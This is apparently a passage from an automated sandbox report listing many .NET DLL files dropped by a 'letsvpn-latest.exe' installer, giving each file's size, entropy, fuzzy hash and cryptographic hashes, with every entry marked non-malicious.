                                                                                                                                                                                                  SSDEEP:768:2xua7db+smzMnSzBt++0YfTF61O+luv5tywq3b2KZBZIS+ST6nkv:2xH7ssKugt+++1luv5tyD3qK2/mB
                                                                                                                                                                                                  MD5:D7EC72C65DE0FFDD7722008425F26B08
                                                                                                                                                                                                  SHA1:38BEC24A3EA5DE5E66C04B86FC532FB1BB9C6E58
                                                                                                                                                                                                  SHA-256:B7DCC93166B69CEBCBE23E459B1307FF828C8DE7909B1C762A403A3F5AC957D7
                                                                                                                                                                                                  SHA-512:B8BEA46B2DCFF31B3867B1642558A2B6B04B832ADB0E8B356FE9A5674B011A47FB411D3075677AC088AB13B4A34166B9B000348F81ED24A12CA61A7C6C1F2ACC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21536
                                                                                                                                                                                                  Entropy (8bit):6.685743907435627
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:JANJdesEvbDYUgmpWrxWNPfWqxWfPthqWOHlLf2KQcvBZ9faGS+ShjmM6IGBkSah:sclTD/yod2rq3b2KZBZrS+ST6nkFh
                                                                                                                                                                                                  MD5:9D42E9C41B33562AFEA35DE7C804C754
                                                                                                                                                                                                  SHA1:006F54589A5F69913032B66152AE6E82FA9DDBC2
                                                                                                                                                                                                  SHA-256:88572FD2F316A9B3DB0C7ED15F46BF599CC478E0180D3CBFF461F2F3C116B419
                                                                                                                                                                                                  SHA-512:872AC5AFF634EFE5A40B3B9F96E3E2391A553A7D696477602829478E4B62C80D6CA7B54E14708A580CC96B2F2A73657B53FB8443A8C211DC2EB6DA92EB7932FC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.980062550753211
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:iGMWCUWDhqWOHlLf2KQcvBZ9koEcobKS+ShjmM6IGBkSDR:i3zq3b2KZBZdE5KS+ST6nkER
                                                                                                                                                                                                  MD5:30A53C66C4F7DBA85CEF0AD632D56D1A
                                                                                                                                                                                                  SHA1:1FC2132D66E81FAC944C924C70BC7196728742BB
                                                                                                                                                                                                  SHA-256:E435FC7019E698A9EA77EF2D8C857E206A67F61EA26D54223EE5700A95D85983
                                                                                                                                                                                                  SHA-512:25D9DF05350FE3A03B8C4FBA186E62930CE1943F5AA52A77C60767ACA5B2AD7B99130950149F62410123E704582154EE958EA54AF5A31ED3DE31F2010D39D702
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):35872
                                                                                                                                                                                                  Entropy (8bit):6.320710151085161
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:k44bN5hwABzKGUn11fF+1WSq3b2KZBZGS+ST6nkNiT:k5bLhLBzcn1gW93qKA/meT
                                                                                                                                                                                                  MD5:A620A68A1816FDE03C3D7654B8CDE81D
                                                                                                                                                                                                  SHA1:DD84D590F2C2D4D6663B705669E6DA477FFD9284
                                                                                                                                                                                                  SHA-256:38A0922D0F78A6CC5C31A28994ECFA1956E280AA76F24B0D52E4863B08ECA47C
                                                                                                                                                                                                  SHA-512:1FFEF524BDDF5E9F7BDB7489F5EAC5933B305F080303BD315B779DD42FD578CA7CB353ED4C29F41244BE23E4FC89AFE329A27240DFC0087ED881431E1C52D7A7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.962051100154249
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:OBhwI7WSQWMhqWOHlLf2KQcvBZ9ZNdS+ShjmM6IGBkSh:ODwIBCq3b2KZBZbS+ST6nkK
                                                                                                                                                                                                  MD5:62AB75D88CC45203A838FA86CAAF189D
                                                                                                                                                                                                  SHA1:2F5A9349B011E54677C30ADD9DDE2E11CF0088D9
                                                                                                                                                                                                  SHA-256:430C25AA7A3D839D77BDAFCC31DDB85670C3E5A6CF7DBD59361A7262466C511E
                                                                                                                                                                                                  SHA-512:0132E274C13147D5B4767345F223882F23D2A4FCB69D708728EF7E8ACF6E2A67814B76F5E508384B15FDA94C2636D98C2C101B5C756459CE611BF815F793E278
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.978691087340885
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:6yvPRW4lWnhqWOHlLf2KQcvBZ99LZ5S+ShjmM6IGBkSks:/396q3b2KZBZXzS+ST6nk2
                                                                                                                                                                                                  MD5:468045C4B51E0F07C15C5F469F6A362C
                                                                                                                                                                                                  SHA1:DBCF255A9A6C3E2B733988664D64D05373C967BD
                                                                                                                                                                                                  SHA-256:E9DEC41A2F095B3F448CEAE1CBB3D782AEDADBB6E941D0AF7984523E253F0BBD
                                                                                                                                                                                                  SHA-512:97BCC2719C9BECAF1A9BFF8CD597F56A1AE6C148C19DDFFFCD3819BA3B97E6107FFD7D8F76F81E29542DA9BFE73DC36E8DAA42CB51E55A74B6644E828F7856FE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.925806153080495
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:n6RW6eWghqWOHlLf2KQcvBZ9SbgnnYOS+ShjmM6IGBkSm:n67Aq3b2KZBZlnnYOS+ST6nkN
                                                                                                                                                                                                  MD5:6EF67383B90630472B4DBE9D61D51D9C
                                                                                                                                                                                                  SHA1:169492A2BE06CC2EA9F476B981DAB0F0F8E35243
                                                                                                                                                                                                  SHA-256:4F28221729A3093D3F3E403EB6121234D69387D902C5026B298BF3CC58074159
                                                                                                                                                                                                  SHA-512:D155F67B9602FCEF1F2EB88648BE5F472FA75E5423360DB3B041B7A512B720743971177254D7D8E8A5F0A8FFF4B4D9D862ACB3E134A1D623F66F2CA94520743B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.960222514973397
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:ESUP9W70WhhqWOHlLf2KQcvBZ9mnLF9YS+ShjmM6IGBkSM:hUeRq3b2KZBZsIS+ST6nkT
                                                                                                                                                                                                  MD5:E0ED9475D368E11A5EBF2FEE0DB4AA8D
                                                                                                                                                                                                  SHA1:D8652BBFE2912F6A3B2FC1CD32230A7A8504C3D5
                                                                                                                                                                                                  SHA-256:02A0AA03887A2F13F6993BC1FF589167A72E9233DA9BFEA8D06F39A1F4E3E452
                                                                                                                                                                                                  SHA-512:7561AE8F0C976817C5DACE0F87ED39D35E7B3FF8DD5D7D3DB03472FB6E484B3359C715490BEED3A7E11DC67F3CE0505CB4A5256D79404300C53708BC3F1CF832
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.956007202011485
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:58yg07W0/WohqWOHlLf2KQcvBZ9gXsS+ShjmM6IGBkSs:5BHZq3b2KZBZBS+ST6nk7
                                                                                                                                                                                                  MD5:6EBBEFC03F03C1DC559F41D9C11CD702
                                                                                                                                                                                                  SHA1:0F2FA9B0BE3AAD5B36DED4481A1339D811ABAA52
                                                                                                                                                                                                  SHA-256:F90DE9000C6D747B69443B3754E1BA110AC88709A1BC27E88FBB304B63F0B019
                                                                                                                                                                                                  SHA-512:741AF8C09090A289C3D88E5B8D89E9CA6FBD54C1A6E62DCC71A6CF1F8AE40D45C322AB02EA3785BCD07BA8EC89597CE0E2CBDB16010BBBF218AFC925B831CDBC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.926537737305858
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Se1WmRWQhqWOHlLf2KQcvBZ9Mo+JS+ShjmM6IGBkSJ3:Sej3q3b2KZBZPwS+ST6nkc3
                                                                                                                                                                                                  MD5:69C49A0199ECD4366220BD0718C8123F
                                                                                                                                                                                                  SHA1:CCDC0B518FC549DF6DA6C8D4E9E29615EB74B773
                                                                                                                                                                                                  SHA-256:255BF1A913BED63A302FF334A49D3CDA16064E17D032883F517634A6E09CEAF1
                                                                                                                                                                                                  SHA-512:80F90E045F79915C38C8413F16A0F8A15B02F4694FB387FFEBD67A1A7A78369AD2AF6EF64232635EBA972DF8F391117B72F128703EC8F9F6BFC76A836D5B8937
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):366112
                                                                                                                                                                                                  Entropy (8bit):5.913155732487538
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:4A0HY8o04jatc9MCELK5h+BO2L1fsqF030f0:4A0HYnitRCOFOI1Wv
                                                                                                                                                                                                  MD5:140C261BA8A0CFC9CDF37B9B84D3A5D7
                                                                                                                                                                                                  SHA1:203FB8572956AD08EECB32217A261FE9C084D6AE
                                                                                                                                                                                                  SHA-256:BE6BDEECE5499E95B1C2CD138980171FD762D37CF3CA66807F1D556D497634CA
                                                                                                                                                                                                  SHA-512:BB754F877D0AE780F5BB1F29B966E8B8F14240304B108537319B2212F9B419656E4F75E0CA983092D69CCEC0ABF34F8B6B0A8F720A383C91D809A5CB3C9D8579
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):143904
                                                                                                                                                                                                  Entropy (8bit):6.189282219926361
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:kUGrszKKLB8a9DvrJeeesIf3amN32AW/rcesL/R:nB8l3/aK32Bc
                                                                                                                                                                                                  MD5:A4C44C10DD8CF211B874DF927FC6982E
                                                                                                                                                                                                  SHA1:C6B01D97636D3D2555754D09BAA00B01029A3B49
                                                                                                                                                                                                  SHA-256:94EE25A9E39BB2CC16A21340F4E18B1D19F32DE920A9233754F4A84142122CBB
                                                                                                                                                                                                  SHA-512:0499CCF78F79E4A0D8A71F201471F17181B6C2A35048D219F7F689029FAEF9AEA71D89DCAB8E8A8CB719413D364623D1B7FE2D8FE1DC7D7A3EAA0AC3886A3A9F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):194080
                                                                                                                                                                                                  Entropy (8bit):6.134658606305299
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:aeruQlNGOhYq0AQcTvankc+8lbKta4FUPAT8xpRI454I/Kv6RpZ8dwPSgQo/yV:bW60VcTvakcXcApOXDV
                                                                                                                                                                                                  MD5:1687F3EF97F927F0ADFBE36929435735
                                                                                                                                                                                                  SHA1:037F0E044A87E6629C5157DF735F395F1295A7F5
                                                                                                                                                                                                  SHA-256:580BCDF39C8795A5A157FC5B6A5A81BD91B388FBA1215A00ACA2DC58C87846A7
                                                                                                                                                                                                  SHA-512:59776468CC0B16E851653C841C8EEEEB26BC9ECC46A94A221FE409EB0467161FDCA504115B9EC69573103BABF8623CC4C41793E5A5CD1FB5D5406D1280535AA7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):38432
                                                                                                                                                                                                  Entropy (8bit):6.461441279464388
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:sVc1GUMB/z6XmY/iee5jq3b2KZBZqS+ST6nk8:sVcHMBm/ieWe3qKk/ma
                                                                                                                                                                                                  MD5:1E33798478F9452D30F03DAE6D1CDF19
                                                                                                                                                                                                  SHA1:B8E1560EA09E66746FFD869588E5E85E8C561713
                                                                                                                                                                                                  SHA-256:491C289BCB0634CAF386E0B175B548D0DD4C69EC44C74E31612B8A3B4B5EEDBB
                                                                                                                                                                                                  SHA-512:FCC55D7313633A896067E31CDE6BB13E0BEC48BBCD32E75384430F25985CECB51F1080C69D6724BAA6973058317019ED6653539CD89DA2D3621EDDCBDBB2F3BD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.948776506140675
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:m6ZWYLWZhqWOHlLf2KQcvBZ9wX74S+ShjmM6IGBkS4cI:m6l+q3b2KZBZEES+ST6nkBcI
                                                                                                                                                                                                  MD5:645261E4A9B6987F58E2DDBDE079B719
                                                                                                                                                                                                  SHA1:1F1FBCA97959753EB34EE48EBB53B9D7FBED89A4
                                                                                                                                                                                                  SHA-256:6E54116F6B216370C0B56EFF67E65C0C1FC36B9BC64EF2D7C6C99A8D522D6135
                                                                                                                                                                                                  SHA-512:12AA410EA7F9D4C36B947A2F33AB7B743BA795023D3EED547B784A94E58D8F7113C7239BCFB94EC692850DD2137409178F1E9039F2EF9CF79FE2E5E30264A953
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.906079947109159
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:d1W1WMQWKhqWOHlLf2KQcvBZ9WyWS+ShjmM6IGBkSn:S1Aq3b2KZBZWS+ST6nkQ
                                                                                                                                                                                                  MD5:E3A134FCE26AD9447AA9CC22217AFB46
                                                                                                                                                                                                  SHA1:16F12C16877CA2FEFFCA363BAA5478C807A6AFAD
                                                                                                                                                                                                  SHA-256:5E06A39547C752DBCB496541D7D6CD35D31ABB4C2D93017F9069CB6CA5E5B751
                                                                                                                                                                                                  SHA-512:C76EC1D0D7CB548A29CD3E79AFE5D3982C89F0B21D9A6DE2C024E11EBFACD022C8CC892552789158722D889689B6D1C8BB855024FFC78C3BF944023C171E1709
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.9354694845948455
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.864133838979022
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.9801791052871645
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.899550672496046
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26144
                                                                                                                                                                                                  Entropy (8bit):6.6921368213375345
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.96273202505333
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.961231388184548
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.971342636879885
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):111648
                                                                                                                                                                                                  Entropy (8bit):5.56134106992795
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:kPOw0SUUKw+GbgjMV+fCY1UiiGZ6qetMXIAMZ2zstK/f3qKfuo/m1:kWw0SUUKBM8aOUiiGw7qa9tK/fio/O
                                                                                                                                                                                                  MD5:44D0AB5E4D54C2EDB7C8FBA9CED026ED
                                                                                                                                                                                                  SHA1:04328EE0F3BBCD8D0567A530431FFCF24CFF58B7
                                                                                                                                                                                                  SHA-256:FBB6E048E1A2FBB2EE2A9D20070DFF1D91155670F37241960B3F119F5DBE4ED1
                                                                                                                                                                                                  SHA-512:B7E31CC9F9C86F2F31B8340EFF76F9777402AD0B0D470B5D8245D2B0067F1F101C0E84218ED8CE7BE9DDA217FC5EA5808155133E3FA2709292252E9BEA0B9EC2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.953385301880804
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:KcDagtDApWSKJWmhqWOHlLf2KQcvBZ9AQSS+ShjmM6IGBkSl:KPKBlq3b2KZBZSS+ST6nki
                                                                                                                                                                                                  MD5:B0F855439076CBAE234ADC363FA0454A
                                                                                                                                                                                                  SHA1:AA2AFB641C8AC4FD2A4796877A77C846AA287259
                                                                                                                                                                                                  SHA-256:4FC68C92932A97435D5996357A89BD6995449591777795E9A42C5063243550C7
                                                                                                                                                                                                  SHA-512:708C1F9B0593CE52A76AE33117C5736BA7B2C4BF006A6D1CF9925550D2620FDB8BA963800863CF89958CBD6AED803419F1C71449D458B50F585327CA9AE749E7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.962671992726357
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:7IWD4WkhqWOHlLf2KQcvBZ9TW4rS+ShjmM6IGBkSW:71Sq3b2KZBZI4rS+ST6nkd
                                                                                                                                                                                                  MD5:B01A80E33A269BF097DBD547BB235468
                                                                                                                                                                                                  SHA1:4BE2ADF5E7EF0BE39D2D917B7B91460396CF8D41
                                                                                                                                                                                                  SHA-256:ABA7106AAA97C956C535990A878CE66DEFE54F064C7616DD2DBF8A9EB6D44ACE
                                                                                                                                                                                                  SHA-512:39FD2FCCEC11F6906CFE453FFE784A98762918BDBB82C47868CC7E3F6CA4EC314DA717D3F3BF5DF50274D9026BF4DBCE5271BD485710BF3A88F471F714705C1B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.89896808782791
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:BMWzQWjhqWOHlLf2KQcvBZ9RDS+ShjmM6IGBkS5Pz:B5rq3b2KZBZbS+ST6nkWb
                                                                                                                                                                                                  MD5:264B3192B5C2C364C8B9AE2790B19153
                                                                                                                                                                                                  SHA1:92CD47F6707C0C598A23973C27BDA209108E0D7B
                                                                                                                                                                                                  SHA-256:06B51B094FAF31639B7B3F7B9569BC7B46A24BFB4BF4E726854503AA3B558C19
                                                                                                                                                                                                  SHA-512:A1CAFAB90CDAE27CB71BEFEE3BDAF8981E93D5B8C11E1E27186C6B721BC2BE05C2DADA828D723A3E3EBFF4AE3C93736472ED9BE645815FE5E1262AC514E0B182
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.840362171078928
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:+xDHKWAMW7hqWOHlLf2KQcvBZ93WXS+ShjmM6IGBkSMZLT:aD8jq3b2KZBZAXS+ST6nkrtT
                                                                                                                                                                                                  MD5:CA9071B879DFAEF54855D52E3DE0B199
                                                                                                                                                                                                  SHA1:9E6339E4B9BE8C070FB085098C727356D5DEE679
                                                                                                                                                                                                  SHA-256:665235BA4540CF50F9AD55572FF1396405205FD9E534D544542E338BD95D09B9
                                                                                                                                                                                                  SHA-512:5EF846C39C0F2C259262315F00D2AAE41EA83D797B8738E6878CBA26DD8654ECD878D036973114CD1E7B6405C6C2895F32CE33C8059D85B8CE14E3FA4C33CCB9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.937994273396533
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:v7LNBEW6pW4hqWOHlLf2KQcvBZ92d2S+ShjmM6IGBkSr:v7bMDq3b2KZBZfS+ST6nk4
                                                                                                                                                                                                  MD5:484B57EB0009BC68590CE5EB4A8DA97C
                                                                                                                                                                                                  SHA1:B0770A0D87F11173925C3890C42C257E9A8AE8F3
                                                                                                                                                                                                  SHA-256:C470136E7C0CA4A95A2BD2A0F33A7FF6BC9FFF04A6668B93FEEC1E6F76159B13
                                                                                                                                                                                                  SHA-512:58A7C977181AB80F21F28E5CC384D32188596FAB4351785A1F26332FC91D690C6B7A1C5B8C638146C42A8069202AFA6877986C3D7D5F586999FEE5ABAD2B7551
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.9847654286076075
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:SKkHKW/tWZhqWOHlLf2KQcvBZ9e/MES+ShjmM6IGBkSJ:HuMq3b2KZBZIMES+ST6nky
                                                                                                                                                                                                  MD5:6CDF73BC6BBA86E628C7B38EDE282D29
                                                                                                                                                                                                  SHA1:A4D3651095CD90BB3499C311EE2D10A2168DA11B
                                                                                                                                                                                                  SHA-256:2E0406BCD2ADAA557F15CEA8F0068F5CF5F7D3DF081162B47EA7033C90CC3907
                                                                                                                                                                                                  SHA-512:7AEDC6B41B9B36A84FF6C0135EDE27EA533F6BE747F1552242E367D21FE945D815187D947BDE53D935F8049CAE5F17E0097E79A245EDA6425EF6817393490C22
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
